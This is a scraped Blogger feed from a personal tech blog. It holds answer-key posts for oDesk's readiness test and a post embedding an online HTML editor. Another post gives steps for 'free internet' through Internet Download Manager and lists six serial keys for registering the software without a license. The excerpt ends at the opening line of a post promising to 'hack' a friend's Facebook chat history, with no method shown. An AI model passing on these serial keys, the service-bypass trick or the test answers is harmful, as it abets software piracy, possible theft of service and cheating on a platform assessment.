&lt;div style="background: white; line-height: 12.0pt; margin-bottom: .0001pt; margin: 0in;"&gt;
&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background: white; line-height: 12.0pt; margin-bottom: .0001pt; margin: 0in;"&gt;
&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;a. Employer billed
automatically each week&lt;br /&gt;
b. &lt;span style="color: magenta;"&gt;How much to pay and when to pay is at the employer’s discretion&lt;/span&gt;&lt;br /&gt;
c. Hours worked will show on your profile&lt;br /&gt;
d. Time-tracking required&lt;br /&gt;
e. Qualify for the oDesk payment guarantee&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;span style="color: #cc0000;"&gt;Answer:&lt;/span&gt; How much to pay and when to pay is at
the employer’s discretion&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: #cc0000;"&gt;Question: 4&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;Which of the following are
TRUE about the oDesk dispute process?&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div style="background: white; line-height: 12.0pt; margin-bottom: .0001pt; margin: 0in;"&gt;
&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;a. The dispute process
only applies to hourly contracts&lt;br /&gt;
b. If you fail to respond, oDesk will refund the employer and suspend your
account&lt;br /&gt;
c. If you reject the dispute, oDesk specialists will review your Work Diary and
evaluate it against the criteria of the payment guarantee&lt;br /&gt;
d. Disputed hours ruled in the employers favor are refunded&lt;br /&gt;
e. A&lt;span style="color: magenta;"&gt;ll of the above&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;span style="color: #cc0000;"&gt;Answer:&lt;/span&gt; All of the above&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;br /&gt;
&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt;
&lt;!--[endif]--&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: #cc0000;"&gt;Question: 5&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;The oDesk Team application
Time Tracker records which of the following?&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div style="background: white; line-height: 12.0pt; margin-bottom: .0001pt; margin: 0in;"&gt;
&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;a. Screenshot of the
active screen once per billing segment&lt;br /&gt;
b. Number of keystrokes&lt;br /&gt;
c. Number of mouse clicks&lt;br /&gt;
d. Memo entered by the contractor&lt;br /&gt;
e. &lt;span style="color: magenta;"&gt;All of the above&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;span style="color: #cc0000;"&gt;Answer:&lt;/span&gt; All of the above&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: #cc0000;"&gt;Question: 6&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;Which of the following are
NOT permitted on oDesk?&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div style="background: white; line-height: 12.0pt; margin-bottom: .0001pt; margin: 0in;"&gt;
&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;a. Sharing a single
account between multiple people&lt;br /&gt;
b. Opening more than one account on oDesk&lt;br /&gt;
c. Using a logo or clip art as your profile portrait&lt;br /&gt;
d. Using a fake name&lt;br /&gt;
e. &lt;span style="color: magenta;"&gt;All of the above&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;span style="color: #cc0000;"&gt;Answer:&lt;/span&gt; All of the above&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: #cc0000;"&gt;Question: 7&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;Staffing managers can apply
to jobs for you.&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div style="background: white; line-height: 12.0pt; margin-bottom: .0001pt; margin: 0in;"&gt;
&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;a. &lt;span style="color: magenta;"&gt;True&lt;/span&gt;&lt;br /&gt;
b. False&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;span style="color: #cc0000;"&gt;Answer: &lt;/span&gt;True&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;br /&gt;
&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt;
&lt;!--[endif]--&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: #cc0000;"&gt;Question: 8&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;What happens when a
contract ends?&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div style="background: white; line-height: 12.0pt; margin-bottom: .0001pt; margin: 0in;"&gt;
&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;a. You lose access to
the Work Diary&lt;br /&gt;
b. Both users can leave feedback&lt;br /&gt;
c. The feedback system is double blind, so your employer cannot see the
feedback you left them until after they have left feedback for you&lt;br /&gt;
d. Hours will be billed (and disputes may be filed) according to the usual
weekly payment schedule&lt;br /&gt;
e. &lt;b&gt;&lt;span style="color: magenta;"&gt;All of the above&lt;/span&gt;&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;span style="color: #cc0000;"&gt;Answer:&lt;/span&gt; All of the above&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;br /&gt;
&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt;
&lt;!--[endif]--&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: #cc0000;"&gt;Question: 9&lt;/span&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;Which of the following
statements is FALSE about oDesk agencies?&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div style="background: white; line-height: 12.0pt; margin-bottom: .0001pt; margin: 0in;"&gt;
&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;a. Agency contractors
work on behalf of an agency on the oDesk platform&lt;br /&gt;
b. Agencies vary in size; from one person to hundreds of skilled contractors&lt;br /&gt;
c. Payments made to agency contractors go to the agency rather than the
contractor&lt;br /&gt;
d. &lt;span style="color: magenta;"&gt;Payments made to agency contractors are automatically split by oDesk between
the agency and the contractor&lt;/span&gt;&lt;br /&gt;
e. An agency is an organization that sells the services of their agency
contractors on oDesk&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;span style="color: #cc0000;"&gt;Answer:&lt;/span&gt; &amp;nbsp; Payments made to agency
contractors are automatically split by oDesk between the agency and the
contractor.&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;br /&gt;
&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt;
&lt;!--[endif]--&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: #cc0000;"&gt;Question: 10&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;Which of the following are
TRUE about your oDesk Work Diary?&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div style="background: white; line-height: 12.0pt; margin-bottom: .0001pt; margin: 0in;"&gt;
&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;a. Allows employers to
see when and what their contractors are working on&lt;br /&gt;
b. Enables automatic billing for hourly contracts&lt;br /&gt;
c. The oDesk Team application auto-tracks time which can be reviewed in the
Work Diary&lt;br /&gt;
d. Manual time can be added, but isn’t guaranteed payment&lt;br /&gt;
e. &lt;span style="color: magenta;"&gt;All of the above&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;span style="color: #cc0000;"&gt;Answer:&lt;/span&gt;&amp;nbsp;&amp;nbsp; All of the above&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: #cc0000;"&gt;Question: 11&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/strong&gt;&lt;strong style="line-height: 12pt;"&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;Which of the following
is FALSE about weekly limits on hourly contracts?&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div style="background: white; line-height: 12.0pt;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="background: white; line-height: 12.0pt;"&gt;
&lt;/div&gt;
&lt;div style="background-position: initial initial; background-repeat: initial initial; line-height: 12pt; margin: 0in 0in 0.0001pt;"&gt;
&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;a. Hours in excess of
the weekly limit will not be billed to the employer&lt;br /&gt;
b. You should discuss any need to work beyond your limit with your employer&lt;br /&gt;
c. &lt;span style="color: magenta;"&gt;The weekly limit can be changed by the contractor&lt;/span&gt;&lt;br /&gt;
d. The weekly limit can be changed by the employer&lt;br /&gt;
e. Hours in excess of the weekly limit are not guaranteed payment&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-position: initial initial; background-repeat: initial initial; line-height: 12pt; margin: 0in 0in 0.0001pt;"&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;span style="color: #cc0000;"&gt;Answer:&lt;/span&gt; &amp;nbsp; The
weekly limit can be changed by the contractor.&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/8243338273268831720/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=8243338273268831720&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/8243338273268831720?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/8243338273268831720?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2013/01/odesk-readiness-test-for-agency.html' title='ODesk Readiness Test for Agency Contractors Answers 2013'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-6I4XeOJxtPQ/UQ4LrHFyfzI/AAAAAAAAATg/oT4nREk0O_Y/s72-c/oDesk.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;DUEDSXk4cCp7ImA9WhNaFk4.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-3265831698433753709</id><published>2013-01-06T15:29:00.000+06:00</published><updated>2013-01-31T19:07:58.738+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2013-01-31T19:07:58.738+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Web Devolopment'/><title>Real Time HTML Editor Instantly !</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-L8SBkQ_dSag/UQpsbDXsF7I/AAAAAAAAATM/Okqr3XLZElQ/s1600/htmls.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-L8SBkQ_dSag/UQpsbDXsF7I/AAAAAAAAATM/Okqr3XLZElQ/s1600/htmls.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="color: #38761d; font-weight: bold;"&gt;&amp;nbsp;&lt;/span&gt;
&lt;iframe frameborder="0" height="455" id="sagor_runi" marginheight="0" marginwidth="0" name="sagor_runi" scrolling="no" src="http://htmledit.tk/" width="550"&gt; &lt;/iframe&gt;&amp;nbsp;Hello visitor &lt;b&gt;&lt;span style="color: #38761d;"&gt;Today i"ll represent A simple but&amp;nbsp;powerfully&amp;nbsp;tor For learn&amp;nbsp;HTML&amp;nbsp;Language.&lt;/span&gt;&lt;/b&gt;&amp;nbsp;&lt;b&gt;&lt;span style="color: #38761d;"&gt;Welcome&amp;nbsp;to real time HTML Editor.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;a href="http://htmledit.tk/" target="_blank"&gt;Full&amp;nbsp;Screen view&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/3265831698433753709/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=3265831698433753709&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/3265831698433753709?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/3265831698433753709?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2013/01/real-time-html-editor-instantly.html' title='Real Time HTML Editor Instantly !'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-L8SBkQ_dSag/UQpsbDXsF7I/AAAAAAAAATM/Okqr3XLZElQ/s72-c/htmls.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;Dk8CRXg8fSp7ImA9WhNUEU8.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-1731392385760446746</id><published>2013-01-02T17:07:00.002+06:00</published><updated>2013-01-02T17:07:44.675+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2013-01-02T17:07:44.675+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='serial key search'/><category scheme='http://www.blogger.com/atom/ns#' term='Tricks 94 FBR'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title>Free Internet Browsing and Download 100% By IDM !</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-w3V0RDAFNuU/UOQSrlGs2vI/AAAAAAAAASE/ALHQYQvhg4A/s1600/free100+copy.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img alt="Free Internet Browsing and Download 100% By IDM !" border="0" height="310" src="http://1.bp.blogspot.com/-w3V0RDAFNuU/UOQSrlGs2vI/AAAAAAAAASE/ALHQYQvhg4A/s320/free100+copy.jpg" title="Free Internet Browsing and Download 100% By IDM !" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Hello visitor&lt;/span&gt;&lt;span style="color: #38761d;"&gt;,&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Today i'll tel how to use free internet with IDM(Internet Download manager).&amp;nbsp;Actually it is old method but 100% good Working.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Step 1:Download the Software&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Step 2:Register your Software by using our serial&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Step 3:&lt;/b&gt;&lt;/span&gt;&lt;b style="color: #38761d;"&gt;Disconnect The Dial up Modem&lt;/b&gt;&lt;br /&gt;
&lt;b style="color: #38761d;"&gt;Step 4:Start a Download link.Then Put username &amp;amp; passward is &lt;/b&gt;&lt;b&gt;&lt;span style="color: magenta;"&gt;Waps &lt;/span&gt;&lt;span style="color: #38761d;"&gt;press ok.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;style&gt;
#wtss{list-style:none; text-decoration:none; font-size:0.9em; font-family:trebuchet ms,sans-serif;}
#wtss a{text-decoration:none; font-family:trebuchet ms,sans-serif;}
#wtss li{position:relative; height:38px; cursor:pointer; padding: 0 !important;}
#wtss .facebook, .googleplus, .pinterest, .rss, .twitter{position:relative; z-index:5; display:block; float:none; margin:10px 0 0; width:210px; height:38px; border-radius:5px; background:url(https://lh4.googleusercontent.com/-l0EYSSxxuc8/UFd37FdwjzI/AAAAAAAAG2E/CDbmwPO4haA/s800/sprites.png) no-repeat;  background-color:rgba(217,30,118,.42); -webkit-box-shadow:rgba(0,0,0,.28) 0 2px 3px; -moz-box-shadow:rgba(0,0,0,.28) 0 2px 3px;  box-shadow:rgba(0,0,0,.28) 0 2px 3px; color:#141414; text-align:left; text-indent:50px; text-shadow:#333 0 1px 0; white-space:nowrap;  line-height:32px; -webkit-transition:width .25s ease-in-out,background-color .25s ease-in-out; -moz-transition:width .25s ease-in-out,background-color .25s ease-in-out; -ms-transition:width .25s ease-in-out,background-color .25s ease-in-out; -o-transition:width .25s ease-in-out,background-color .25s ease-in-out; transition:width .25s ease-in-out,background-color .25s ease-in-out; -o-box-shadow:rgba(0,0,0,.28) 0 2px 3px;}
#wtss li:after{position:absolute; top:0; left:50px; z-index:2; display:block; height:38px; color:#141414; content:attr(data-alt);  line-height:32px;}
#wtss .icon{overflow:hidden; color:#fafafa;}
#wtss .facebook{width:32px; height:32px; background-color:rgba(59,89,152,0.42); background-position:0 0;}
#wtss .twitter{width:32px; height:32px; background-color:rgba(64,153,255,0.42); background-position:0 -33px;}
#wtss .googleplus{width:32px; height:32px; background-color:rgba(228,69,36,0.42); background-position:-3px -66px;}
#wtss .pinterest{width:32px; height:32px; background-color:rgba(174,45,39,0.42); background-position:0 -95px;}
#wtss .rss{ width:32px;  height:32px;  background-color:rgba(255,102,0,0.42); background-position:-3px -126px;}
#wtss li:hover .icon,
.touch #wtss li .icon{width:210px;}
.touch #wtss li .facebook, #wtss li:hover .facebook{background-color:rgba(59,89,152,1);}
.touch #wtss li .twitter, #wtss li:hover .twitter{background-color:rgba(64,153,255,1);}
.touch #wtss li .googleplus, #wtss li:hover .googleplus{background-color:rgba(228,69,36,1);}
.touch #wtss li .pinterest, #wtss li:hover .pinterest{background-color:rgba(174,45,39,1);}
.touch #wtss li .rss, #wtss li:hover .rss{background-color:rgba(255,102,0,1);}
&lt;/style&gt;

&lt;br /&gt;
&lt;ul id="wtss"&gt;
&lt;li data-alt="Download From Softpedia"&gt;&lt;a class="icon facebook" href="http://mirror2.internetdownloadmanager.com/idman614.exe"&gt;Download From Softpedia&lt;/a&gt;&lt;/li&gt;
&lt;li data-alt="Download From other server"&gt;&lt;a class="icon twitter" href="http://www.twitter.com/madebd"&gt;Download From other server&lt;/a&gt;&lt;/li&gt;
&lt;li data-alt="Download From other server"&gt;&lt;a class="icon googleplus" href="http://plus.google.com/103593204016755715965"&gt;Download From other server&lt;/a&gt;&lt;/li&gt;
&lt;li data-alt="Download From other server"&gt;&lt;a class="icon rss" href="http://feeds.feedburner.com/projuktirkhela"&gt;Download From other server&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Use our Serial Key&lt;/span&gt;&lt;/b&gt;&lt;/h3&gt;
&lt;span style="color: magenta;"&gt;D60G8-Y85O8-B5YZV-U0PB3&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;AT6H7-TDK7X-YMB5W-QA809&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;DUJ7M-BBNR6-CML6I-9HVEY&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;U6JY7-O1C4Z-OPPJR-0JXHH&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;9QZWY-4AFHB-IPJ4T-RBJSE&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;D87W5-CKD63-RGUNI-X68EG&lt;/span&gt;&amp;nbsp; &lt;br /&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/1731392385760446746/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=1731392385760446746&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/1731392385760446746?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/1731392385760446746?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2013/01/free-internet-browsing-and-download-100.html' title='Free Internet Browsing and Download 100% By IDM !'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-w3V0RDAFNuU/UOQSrlGs2vI/AAAAAAAAASE/ALHQYQvhg4A/s72-c/free100+copy.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;A08HR34-fCp7ImA9WhNWFUs.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-4059748650257666395</id><published>2012-12-15T17:10:00.002+06:00</published><updated>2012-12-15T17:10:36.054+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-12-15T17:10:36.054+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Facebook'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title>Hack your Friend's Facebook Chat History !</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-tMapqSCZ--Y/UMxZaVHfe2I/AAAAAAAAARc/yD6R6VFHdlw/s1600/facebook-chat-hack.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-tMapqSCZ--Y/UMxZaVHfe2I/AAAAAAAAARc/yD6R6VFHdlw/s1600/facebook-chat-hack.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;T&lt;/b&gt;&lt;b&gt;oday &lt;/b&gt;&lt;b&gt;I'll&lt;/b&gt;&lt;b&gt; explain how to hack your friend's Facebook chat history easily by a simple trick.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
